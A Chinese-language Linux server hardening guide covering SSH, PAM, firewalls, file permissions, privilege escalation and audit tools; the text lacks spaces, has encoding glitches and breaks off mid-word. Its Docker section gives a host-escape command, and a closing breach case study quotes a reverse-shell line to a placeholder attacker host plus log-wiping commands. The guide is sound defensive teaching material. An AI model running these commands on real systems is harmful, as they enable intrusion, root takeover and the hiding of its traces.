Linux服務(wù)器安全防御指南第一章：Linux安全概述為什么Linux安全至關(guān)重要？盡管Linux以安全著稱，但面臨的威脅依然嚴(yán)峻。作為支撐全球大部分互聯(lián)網(wǎng)基礎(chǔ)設(shè)施的操作系統(tǒng)，Linux服務(wù)器是黑客的首要目標(biāo)。一旦被攻破，不僅導(dǎo)致數(shù)據(jù)泄露，還可能被用作攻擊其他目標(biāo)的跳板。Linux服務(wù)器被攻擊的真實(shí)案例實(shí)驗(yàn)室服務(wù)器被挖礦事件2022年某高校實(shí)驗(yàn)室服務(wù)器被植入挖礦程序，CPU使用率持續(xù)100%。攻擊者通過(guò)弱口令猜測(cè)成功進(jìn)入系統(tǒng)，并利用內(nèi)核漏洞獲取了root權(quán)限，隨后安裝了隱蔽的挖礦軟件。黑客利用默認(rèn)配置入侵攻擊者掃描發(fā)現(xiàn)服務(wù)器SSH端口開(kāi)放，且允許root直接登錄。通過(guò)字典攻擊成功猜測(cè)簡(jiǎn)單密碼，獲取完全控制權(quán)。原因是管理員未更改默認(rèn)安全配置，埋下安全隱患。被攻陷后的風(fēng)險(xiǎn)與影響Linux安全的基本原則最小權(quán)限原則為用戶、程序和系統(tǒng)服務(wù)只分配完成任務(wù)所需的最小權(quán)限。避免使用root賬戶進(jìn)行日常操作，限制sudo權(quán)限，減少潛在攻擊面。防御深度策略構(gòu)建多層次防御體系，包括網(wǎng)絡(luò)防火墻、主機(jī)防火墻、訪問(wèn)控制、入侵檢測(cè)等。單一防御措施被突破時(shí)，其他層次仍能提供保護(hù)。持續(xù)監(jiān)控與及時(shí)響應(yīng)第二章：用戶與權(quán)限管理基礎(chǔ)root用戶的危險(xiǎn)性root用戶擁有系統(tǒng)的完全控制權(quán)，一旦被黑客獲取，整個(gè)系統(tǒng)將完全暴露。應(yīng)當(dāng)嚴(yán)格限制root登錄，特別是遠(yuǎn)程登錄，轉(zhuǎn)而使用普通用戶+sudo進(jìn)行管理。普通用戶創(chuàng)建與權(quán)限分配為不同任務(wù)創(chuàng)建專用的普通用戶，嚴(yán)格遵循職責(zé)分離原則，確保每個(gè)用戶只擁有完成其任務(wù)所需的最小權(quán)限集合。sudo權(quán)限配置合理配置sudoers文件，允許授權(quán)用戶執(zhí)行特定的管理命令，而不是授予全部超級(jí)用戶權(quán)限。定期審計(jì)sudo日志，監(jiān)控特權(quán)命令使用情況。禁用root密碼登錄在Linux服務(wù)器中，允許root用戶直接通過(guò)密碼遠(yuǎn)程登錄是一個(gè)嚴(yán)重的安全隱患。這為黑客提供了直接攻擊系統(tǒng)最高權(quán)限賬戶的機(jī)會(huì)。通過(guò)修改SSH配置文件，可以有效禁止這種不安全的登錄方式。#編輯SSH配置文件sudovim/etc/ssh/sshd_config#修改或添加以下行PermitRootLoginno#重啟SSH服務(wù)使配置生效sudosystemctlrestartsshd在禁用root登錄之前，請(qǐng)確保已創(chuàng)建具有sudo權(quán)限的普通用戶賬戶，否則可能導(dǎo)致無(wú)法遠(yuǎn)程管理服務(wù)器！此配置修改后，所有嘗試直接以root身份登錄的SSH連接將被自動(dòng)拒絕，即使提供了正確的密碼。這大大降低了服務(wù)器被暴力破解的風(fēng)險(xiǎn)。創(chuàng)建安全的普通用戶創(chuàng)建新用戶#創(chuàng)建新用戶sudoaddusersecurity_admin#設(shè)置強(qiáng)密碼#系統(tǒng)會(huì)提示輸入密碼避免使用常見(jiàn)用戶名如admin、test、user等，這些是黑客首先嘗試的目標(biāo)。分配sudo權(quán)限#將用戶添加到sudo組sudousermod-aGsudosecurity_admin#或編輯sudoers文件sudovisudo#添加行:security_adminALL=(ALL:ALL)ALL這允許用戶執(zhí)行需要特權(quán)的命令，同時(shí)保留操作日志。驗(yàn)證配置#切換到新用戶su-security_admin#測(cè)試sudo權(quán)限sudols-la/root#檢查用戶組groups確保用戶能正常使用sudo命令，并驗(yàn)證權(quán)限配置正確。創(chuàng)建安全的普通用戶是服務(wù)器安全的基礎(chǔ)。通過(guò)合理分配權(quán)限，可以在保證管理便捷性的同時(shí)，最大限度減少安全風(fēng)險(xiǎn)。密碼復(fù)雜度策略配置弱密碼是服務(wù)器被入侵的主要原因之一。配置強(qiáng)密碼策略可以有效防止簡(jiǎn)單密碼的使用，提高系統(tǒng)安全性。Linux系統(tǒng)可以通過(guò)PAM模塊實(shí)現(xiàn)密碼復(fù)雜度控制。#安裝密碼質(zhì)量檢查模塊sudoaptinstalllibpam-pwquality#編輯PAM配置文件sudovim/etc/pam.d/common-password找到包含"pam_pwquality.so"的行，修改或添加以下參數(shù)：passwordrequisitepam_pwquality.soretry=3minlen=12difok=3ucredit=-1lcredit=-1dcredit=-1ocredit=-1reject_usernameenforce_for_root參數(shù)說(shuō)明retry=3：允許重試3次minlen=12：最小密碼長(zhǎng)度12個(gè)字符difok=3：與舊密碼至少有3個(gè)字符不同ucredit=-1：至少包含1個(gè)大寫字母lcredit=-1：至少包含1個(gè)小寫字母dcredit=-1：至少包含1個(gè)數(shù)字ocredit=-1：至少包含1個(gè)特殊字符reject_username：不允許密碼包含用戶名enforce_for_root：對(duì)root用戶也強(qiáng)制執(zhí)行密碼重試限制與賬戶鎖定pam_faillock模塊介紹pam_faillock是LinuxPAM的一個(gè)模塊，用于跟蹤失敗的登錄嘗試，并在超過(guò)設(shè)定閾值時(shí)鎖定賬戶。這是防止暴力破解攻擊的有效手段，可以顯著提高系統(tǒng)的安全性。配置步驟#安裝faillock（部分發(fā)行版需要）sudoaptinstalllibpam-faillock#編輯PAM配置sudovim/etc/pam.d/common-auth#添加:authrequiredpam_faillock.sopreauthsilentdeny=5unlock_time=1800auth[default=die]pam_faillock.soauthfailauthsufficientpam_faillock.soauthsucc管理鎖定賬戶#查看失敗登錄記錄sudofaillock--userusername#解鎖被鎖定用戶sudofaillock--userusername--reset這種配置使系統(tǒng)在用戶連續(xù)5次登錄失敗后鎖定賬戶30分鐘(1800秒)，有效防止暴力破解。第三章：SSH安全加固SSH(SecureShell)是Linux服務(wù)器遠(yuǎn)程管理的主要工具，也是黑客首要的攻擊目標(biāo)。默認(rèn)情況下，SSH服務(wù)在22端口監(jiān)聽(tīng)，這是眾所周知的，因此成為自動(dòng)化掃描和攻擊的首選。提高SSH安全性的關(guān)鍵步驟修改默認(rèn)端口22為非標(biāo)準(zhǔn)端口(如2222或更高)禁用密碼認(rèn)證，啟用更安全的密鑰認(rèn)證限制允許登錄的用戶，禁止root直接登錄配置防火墻，只允許特定IP地址連接SSH設(shè)置SSH連接超時(shí)，避免閑置連接使用Fail2Ban等工具防止暴力破解這些措施共同構(gòu)成了多層次的SSH安全防御體系，能有效降低SSH服務(wù)被攻擊的風(fēng)險(xiǎn)。禁用密碼登錄，啟用密鑰認(rèn)證生成SSH密鑰對(duì)#在本地計(jì)算機(jī)生成密鑰對(duì)ssh-keygen-ted25519-C"安全訪問(wèn)服務(wù)器"#密鑰默認(rèn)保存在:#~/.ssh/id_ed25519(私鑰)#~/.ssh/id_ed25519.pub(公鑰)私鑰必須妥善保管，不要分享給他人。建議使用密碼保護(hù)私鑰。部署公鑰到服務(wù)器#復(fù)制公鑰到服務(wù)器ssh-copy-id-i~/.ssh/id_ed25519.pubuser@服務(wù)器IP#或手動(dòng)添加到服務(wù)器#在服務(wù)器上:mkdir-p~/.sshecho"你的公鑰內(nèi)容">>~/.ssh/authorized_keyschmod700~/.sshchmod600~/.ssh/authorized_keys禁用密碼認(rèn)證#編輯SSH配置文件sudovim/etc/ssh/sshd_config#修改以下設(shè)置:PasswordAuthenticationnoChallengeResponseAuthenticationnoUsePAMno#重啟SSH服務(wù)sudosystemctlrestartsshd此配置生效后，只有持有私鑰的用戶才能登錄系統(tǒng)。Fail2Ban防暴力破解工具Fail2Ban工作原理Fail2Ban通過(guò)監(jiān)控系統(tǒng)日志文件（如/var/log/auth.log），檢測(cè)失敗的登錄嘗試。當(dāng)特定IP地址在短時(shí)間內(nèi)產(chǎn)生多次失敗登錄嘗試時(shí)，F(xiàn)ail2Ban會(huì)通過(guò)防火墻規(guī)則臨時(shí)封禁該IP地址，有效防止暴力破解攻擊。#安裝Fail2Bansudoaptinstallfail2ban#創(chuàng)建本地配置文件sudocp/etc/fail2ban/jail.conf/etc/fail2ban/jail.localsudovim/etc/fail2ban/jail.local配置SSH防護(hù)[sshd]enabled=trueport=2222filter=sshdlogpath=/var/log/auth.logmaxretry=3bantime=3600findtime=600此配置表示：如果某IP在10分鐘內(nèi)有3次失敗的SSH登錄嘗試，將被封禁1小時(shí)。服務(wù)器安全日志顯示，啟用Fail2Ban后，惡意登錄嘗試減少了95%以上。防火墻基礎(chǔ)與配置UFW簡(jiǎn)介UFW(UncomplicatedFirewall)是Ubuntu系統(tǒng)默認(rèn)的防火墻配置工具，提供簡(jiǎn)單易用的命令行界面，是iptables的前端程序。它能有效控制進(jìn)出服務(wù)器的網(wǎng)絡(luò)流量，是服務(wù)器安全的重要一環(huán)?；九渲?安裝UFWsudoaptinstallufw#設(shè)置默認(rèn)策略sudoufwdefaultdenyincomingsudoufwdefaultallowoutgoing#允許SSH(假設(shè)端口已修改為2222)sudoufwallow2222/tcp#允許Web服務(wù)sudoufwallow80/tcpsudoufwallow443/tcp啟用防火墻#啟用UFWsudoufwenable#檢查狀態(tài)sudoufwstatusverbose#查看規(guī)則編號(hào)sudoufwstatusnumbered#刪除規(guī)則sudoufwdelete[規(guī)則編號(hào)]記住：?jiǎn)⒂梅阑饓η按_保已添加SSH訪問(wèn)規(guī)則，否則可能被鎖定在系統(tǒng)外！禁用Ping響應(yīng)防止探測(cè)ICMP協(xié)議（尤其是ping命令）常被攻擊者用來(lái)探測(cè)服務(wù)器是否在線以及收集網(wǎng)絡(luò)信息。通過(guò)禁用ping響應(yīng)，可以增加服務(wù)器的隱蔽性，使攻擊者更難發(fā)現(xiàn)和定位服務(wù)器。臨時(shí)禁用Ping響應(yīng)#臨時(shí)禁用(重啟后失效)sudosysctl-wnet.ipv4.icmp_echo_ignore_all=1永久禁用Ping響應(yīng)#編輯sysctl配置文件sudovim/etc/sysctl.conf#添加或修改以下行net.ipv4.icmp_echo_ignore_all=1#應(yīng)用更改sudosysctl-p使用iptables禁用Ping#通過(guò)iptables禁用pingsudoiptables-AINPUT-picmp--icmp-typeecho-request-jDROP#保存iptables規(guī)則(Debian/Ubuntu)sudoaptinstalliptables-persistentsudonetfilter-persistentsave禁用ping可能會(huì)影響網(wǎng)絡(luò)故障排查。在關(guān)鍵服務(wù)器上，可以考慮只允許特定IP地址的ping請(qǐng)求，而不是完全禁用。第四章：文件權(quán)限與安全Linux文件權(quán)限模型Linux使用用戶(u)、組(g)和其他人(o)三級(jí)權(quán)限模型，每級(jí)包含讀(r)、寫(w)和執(zhí)行(x)權(quán)限。使用數(shù)字表示法：r=4,w=2,x=1，例如：chmod644設(shè)置為rw-r--r--權(quán)限。常見(jiàn)權(quán)限錯(cuò)誤最危險(xiǎn)的配置是賦予過(guò)大權(quán)限，如chmod777（所有人可讀寫執(zhí)行）或chmod666（所有人可讀寫）。這些配置可能導(dǎo)致未授權(quán)訪問(wèn)、數(shù)據(jù)泄露或惡意代碼執(zhí)行。查找危險(xiǎn)權(quán)限文件#查找世界可寫文件find/-typef-perm-002-not-path"/proc/*"-ls#查找無(wú)主文件find/-nouser-o-nogroup-lsSUID與SGID權(quán)限風(fēng)險(xiǎn)什么是SUID/SGID位SUID（SetUserID）和SGID（SetGroupID）是Linux特殊權(quán)限位，允許用戶以文件所有者或所屬組的身份執(zhí)行程序。在文件權(quán)限中表現(xiàn)為"s"標(biāo)志，如：-rwsr-xr-x。SUID/SGID在某些場(chǎng)景下是必要的，例如passwd命令需要以root身份修改/etc/shadow文件。但不當(dāng)設(shè)置的SUID/SGID權(quán)限會(huì)導(dǎo)致嚴(yán)重的安全問(wèn)題。檢測(cè)與修復(fù)#查找SUID文件find/-typef-perm-4000-ls#查找SGID文件find/-typef-perm-2000-ls#移除不必要的SUID權(quán)限sudochmodu-s/path/to/file#移除不必要的SGID權(quán)限sudochmodg-s/path/to/file定期審計(jì)具有SUID/SGID權(quán)限的文件，移除不必要的特權(quán)，是服務(wù)器安全維護(hù)的重要環(huán)節(jié)。關(guān)鍵配置文件保護(hù)用戶賬戶文件#/etc/passwd-用戶賬戶信息-rw-r--r--1rootroot#正確權(quán)限:644#/etc/shadow-加密密碼-rw-r-----1rootshadow#正確權(quán)限:640#/etc/group-組信息-rw-r--r--1rootroot#正確權(quán)限:644這些文件包含系統(tǒng)用戶信息，必須嚴(yán)格保護(hù)。不正確的權(quán)限可能導(dǎo)致密碼泄露或身份冒用。SSH配置文件#/etc/ssh/sshd_config-rw-r--r--1rootroot#正確權(quán)限:644#私鑰(~/.ssh/id_*)-rw-------1useruser#正確權(quán)限:600#公鑰(~/.ssh/*.pub)-rw-r--r--1useruser#正確權(quán)限:644#authorized_keys-rw-------1useruser#正確權(quán)限:600SSH密鑰文件權(quán)限過(guò)大會(huì)被SSH客戶端拒絕使用，這是一種安全保護(hù)機(jī)制。修復(fù)不正確權(quán)限#修復(fù)/etc/shadow權(quán)限sudochmod640/etc/shadowsudochownroot:shadow/etc/shadow#修復(fù)SSH私鑰權(quán)限chmod600~/.ssh/id_rsachmod600~/.ssh/id_ed25519#修復(fù)~/.ssh目錄權(quán)限chmod700~/.ssh定期使用自動(dòng)化腳本檢查關(guān)鍵文件權(quán)限，確保它們保持正確的設(shè)置。日志審計(jì)與異常檢測(cè)重要日志文件位置/var/log/auth.log-認(rèn)證相關(guān)日志/var/log/secure-安全相關(guān)日志(CentOS)/var/log/syslog-系統(tǒng)日志/var/log/messages-系統(tǒng)消息/var/log/httpd/-Web服務(wù)器日志/var/log/mysql/-數(shù)據(jù)庫(kù)日志/var/log/fail2ban.log-Fail2Ban日志定期檢查這些日志是發(fā)現(xiàn)系統(tǒng)異常和潛在安全問(wèn)題的關(guān)鍵步驟。日志分析工具#安裝logwatchsudoaptinstalllogwatch#生成日?qǐng)?bào)告sudologwatch--detailhigh--mailtoyour@#安裝auditd審計(jì)系統(tǒng)sudoaptinstallauditd#配置監(jiān)控文件訪問(wèn)sudoauditctl-w/etc/passwd-prwxa-kpasswd_changes可疑活動(dòng)指標(biāo)包括：多次失敗的登錄嘗試、非常規(guī)時(shí)間的登錄、權(quán)限變更操作、敏感文件訪問(wèn)、非預(yù)期的網(wǎng)絡(luò)連接等。及時(shí)發(fā)現(xiàn)并響應(yīng)這些異常行為是防止入侵的關(guān)鍵。第五章：Linux特權(quán)提升攻擊與防護(hù)特權(quán)提升(PrivilegeEscalation)是攻擊者獲取系統(tǒng)更高權(quán)限的過(guò)程，從普通用戶權(quán)限提升到root權(quán)限。了解攻擊者的手法，才能更好地防御系統(tǒng)。1橫向特權(quán)提升攻擊者在同級(jí)別權(quán)限內(nèi)獲取其他用戶的訪問(wèn)權(quán)限，如利用可讀的配置文件中存儲(chǔ)的憑證來(lái)訪問(wèn)不同的服務(wù)。2縱向特權(quán)提升攻擊者從低權(quán)限用戶提升到更高權(quán)限，最終目標(biāo)通常是獲取root權(quán)限。主要通過(guò)系統(tǒng)漏洞、配置錯(cuò)誤、可利用的SUID程序等途徑實(shí)現(xiàn)。3常見(jiàn)提權(quán)途徑內(nèi)核漏洞利用（如臟牛DirtyCOW漏洞）錯(cuò)誤配置的sudo權(quán)限可被利用的SUID/SGID程序錯(cuò)誤的文件權(quán)限設(shè)置明文存儲(chǔ)的憑證不安全的PATH配置利用內(nèi)核漏洞提權(quán)識(shí)別系統(tǒng)內(nèi)核版本#顯示內(nèi)核版本uname-a#查看發(fā)行版詳細(xì)信息cat/etc/os-releaselsb_release-a#檢查已安裝的內(nèi)核安全更新aptlist--installed|greplinux-imageyumlistinstalled|grepkernel了解當(dāng)前內(nèi)核版本是評(píng)估系統(tǒng)漏洞風(fēng)險(xiǎn)的第一步。過(guò)時(shí)的內(nèi)核版本通常包含多個(gè)已知的安全漏洞。內(nèi)核漏洞防護(hù)保持系統(tǒng)和內(nèi)核更新：sudoaptupdate&&sudoaptupgrade監(jiān)控安全公告：訂閱發(fā)行版安全郵件列表使用自動(dòng)安全更新：aptinstallunattended-upgrades配置內(nèi)核保護(hù)機(jī)制：sysctl安全設(shè)置使用SELinux或AppArmor限制進(jìn)程權(quán)限實(shí)施定期漏洞掃描和滲透測(cè)試2016年的"臟牛"(DirtyCOW)漏洞(CVE-2016-5195)影響了大量Linux系統(tǒng)，允許本地用戶通過(guò)競(jìng)爭(zhēng)條件獲取root權(quán)限。此漏洞在Linux內(nèi)核中存在多年未被發(fā)現(xiàn)。環(huán)境變量與路徑注入攻擊PATH變量的安全隱患PATH環(huán)境變量決定了命令搜索的目錄順序。如果將"."（當(dāng)前目錄）或用戶可寫目錄放在PATH的前面，攻擊者可以在這些目錄中放置同名惡意程序，當(dāng)用戶執(zhí)行命令時(shí)會(huì)優(yōu)先執(zhí)行這些惡意程序。#檢查當(dāng)前PATHecho$PATH#危險(xiǎn)的PATH配置PATH=.:$PATH#當(dāng)前目錄在前PATH=/tmp:$PATH#公共可寫目錄在前安全PATH配置安全的PATH配置應(yīng)該只包含受信任的系統(tǒng)目錄，且將系統(tǒng)目錄放在前面。修改/etc/profile或~/.bashrc確保全局或用戶級(jí)PATH設(shè)置安全。#安全的PATH設(shè)置PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin#在.bashrc中設(shè)置exportPATH=/usr/local/bin:/usr/bin:/bin腳本安全編寫規(guī)范編寫腳本時(shí)應(yīng)明確指定命令的完整路徑，避免依賴PATH環(huán)境變量，特別是在需要特權(quán)執(zhí)行的腳本中。#不安全的腳本命令rm-rf/tmp/old_logs#安全的腳本命令/bin/rm-rf/tmp/old_logs使用set-e確保腳本在任何命令失敗時(shí)立即退出，防止部分執(zhí)行導(dǎo)致的安全問(wèn)題。Docker與容器安全風(fēng)險(xiǎn)Docker組權(quán)限風(fēng)險(xiǎn)將普通用戶添加到docker組實(shí)際上相當(dāng)于給予了root權(quán)限，因?yàn)閐ocker組成員可以創(chuàng)建掛載宿主機(jī)根目錄的容器，從而完全控制宿主機(jī)。#危險(xiǎn)操作：普通用戶在docker組內(nèi)sudousermod-aGdockeruser#提權(quán)示例（docker組成員可執(zhí)行）dockerrun-v/:/host-itubuntuchroot/host上述命令允許用戶通過(guò)Docker容器訪問(wèn)宿主機(jī)的整個(gè)文件系統(tǒng)，等同于root權(quán)限。Docker安全最佳實(shí)踐限制能運(yùn)行docker命令的用戶，避免將普通用戶加入docker組使用rootless模式運(yùn)行Docker容器內(nèi)使用非root用戶運(yùn)行應(yīng)用限制容器資源使用（CPU、內(nèi)存、網(wǎng)絡(luò)）定期更新Docker引擎和基礎(chǔ)鏡像掃描鏡像漏洞：dockerscanimage-name使用--read-only參數(shù)運(yùn)行容器實(shí)施容器網(wǎng)絡(luò)隔離策略第六章：定時(shí)任務(wù)與自動(dòng)化安全cron定時(shí)任務(wù)安全隱患cron任務(wù)通常以創(chuàng)建者的權(quán)限運(yùn)行，包括root用戶的cron任務(wù)。不安全的cron腳本可能被攻擊者利用來(lái)執(zhí)行惡意代碼或提升權(quán)限。常見(jiàn)風(fēng)險(xiǎn)包括：腳本中的命令注入漏洞、腳本權(quán)限設(shè)置不當(dāng)、使用相對(duì)路徑導(dǎo)致的路徑劫持等。檢查和限制cron任務(wù)#查看當(dāng)前用戶的cron任務(wù)crontab-l#查看系統(tǒng)cron任務(wù)ls-la/etc/cron*cat/etc/crontabls-la/var/spool/cron/#限制cron使用echo"root">/etc/cron.allow通過(guò)創(chuàng)建/etc/cron.allow文件，可以限制只有指定用戶才能創(chuàng)建cron任務(wù)，提高系統(tǒng)安全性。防止惡意定時(shí)任務(wù)植入為cron腳本設(shè)置正確的權(quán)限：chmod700使用絕對(duì)路徑指定命令驗(yàn)證腳本完整性：sha256sum監(jiān)控cron配置文件變更定期審計(jì)系統(tǒng)中的定時(shí)任務(wù)使用版本控制管理自動(dòng)化腳本SELinux與AppArmor安全模塊SELinux基本概念SELinux(Security-EnhancedLinux)是由美國(guó)國(guó)家安全局開(kāi)發(fā)的Linux內(nèi)核安全模塊，提供強(qiáng)制訪問(wèn)控制(MAC)機(jī)制，限制進(jìn)程只能訪問(wèn)明確允許的資源，即使進(jìn)程被攻破也無(wú)法訪問(wèn)未授權(quán)資源。#查看SELinux狀態(tài)getenforce#設(shè)置SELinux模式setenforce1#強(qiáng)制模式setenforce0#寬容模式#配置SELinuxvim/etc/selinux/config#SELINUX=enforcing|permissive|disabledAppArmor簡(jiǎn)介AppArmor是另一種Linux安全模塊，主要用于Ubuntu等發(fā)行版。它基于路徑名而非安全上下文標(biāo)簽，配置相對(duì)簡(jiǎn)單，但靈活性稍低。AppArmor通過(guò)配置文件限制程序的資源訪問(wèn)權(quán)限。#查看AppArmor狀態(tài)aa-status#加載配置文件apparmor_parser-r/etc/apparmor.d/profile#切換模式aa-enforce/path/to/profile#強(qiáng)制模式aa-complain/path/to/profile#寬容模式SELinux或AppArmor的正確配置能顯著提高系統(tǒng)安全性，即使其他防御機(jī)制被突破，也能有效限制攻擊者的活動(dòng)范圍。第七章：安全加固工具與資源Lynis安全審計(jì)工具Lynis是開(kāi)源的安全審計(jì)工具，能自動(dòng)掃描系統(tǒng)配置，檢測(cè)安全問(wèn)題并提供加固建議。它可以檢查系統(tǒng)設(shè)置、軟件配置、訪問(wèn)控制和防火墻規(guī)則等多個(gè)方面。#安裝Lynissudoaptinstalllynis#運(yùn)行全面系統(tǒng)審計(jì)sudolynisauditsystem#查看報(bào)告less/var/log/lynis.logrootkit檢測(cè)工具chkrootkit和rkhunter是兩款流行的rootkit檢測(cè)工具，能識(shí)別系統(tǒng)中潛在的后門程序和惡意軟件。定期運(yùn)行這些工具有助于及早發(fā)現(xiàn)系統(tǒng)入侵跡象。#安裝chkrootkitsudoaptinstallchkrootkitsudochkrootkit#安裝rkhuntersudoaptinstallrkhuntersudorkhunter--updatesudorkhunter--check安全學(xué)習(xí)資源CIS(CenterforInternetSecurity)基準(zhǔn)指南NIST(NationalInstituteofStandardsandTechnology)安全出版物OWASP(OpenWebApplicationSecurityProject)安全指南RedHat/CentOS安全指南Ubuntu安全手冊(cè)Linux安全社區(qū)：LWN.net,LinuxS真實(shí)案例分析：服務(wù)器被攻破全過(guò)程1初始訪問(wèn)攻擊者通過(guò)自動(dòng)化工具掃描互聯(lián)網(wǎng)上的SSH服務(wù)，發(fā)現(xiàn)目標(biāo)服務(wù)器的22端口開(kāi)放且允許密碼認(rèn)證。使用字典攻擊成功猜測(cè)出弱密碼"admin123"，獲得了普通用戶"webadmin"的訪問(wèn)權(quán)限。2信息收集攻擊者登錄后執(zhí)行了系統(tǒng)信息收集：uname-a顯示內(nèi)核版本較舊；sudo-l發(fā)現(xiàn)用戶可以無(wú)密碼執(zhí)行某些命令；find/-perm-40002>/dev/null查找了所有SUID文件。3權(quán)限提升攻擊者發(fā)現(xiàn)webadmin用戶可以以root身份運(yùn)行特定腳本：sudo/usr/local/bin/backup.sh。查看腳本內(nèi)容后發(fā)現(xiàn)可寫入，修改添加了惡意命令：echo'bash-i>&/dev/tcp/attacker-ip/44440>&1'>>/usr/local/bin/backup.sh，執(zhí)行后獲得root權(quán)限。4持久化攻擊者植入后門：創(chuàng)建隱藏用戶、安裝SSH密鑰、添加cron任務(wù)以保持訪問(wèn)。同時(shí)清除日志：echo>/var/log/auth.log，history-c刪除命令歷史，掩蓋入侵痕跡。防御措施：該案例中，實(shí)施SSH密鑰認(rèn)證、限制sudo權(quán)限、定期更新系統(tǒng)以及使用安全審計(jì)工具本可以阻止此次入侵。安全意識(shí)和基本防護(hù)措施的缺失是造成入侵成功的主要原因。安全意識(shí)與日常運(yùn)維建議定期更新與補(bǔ)丁管理安全更新是防御已知漏洞的最基本方法。建立定期更新計(jì)劃，包括操作系統(tǒng)和應(yīng)用程序。對(duì)于生產(chǎn)服務(wù)器，先在測(cè)試環(huán)境驗(yàn)證更新，確保不會(huì)影響業(yè)務(wù)功能。#自動(dòng)安全更新配置(Ubuntu)sudoaptinstallunat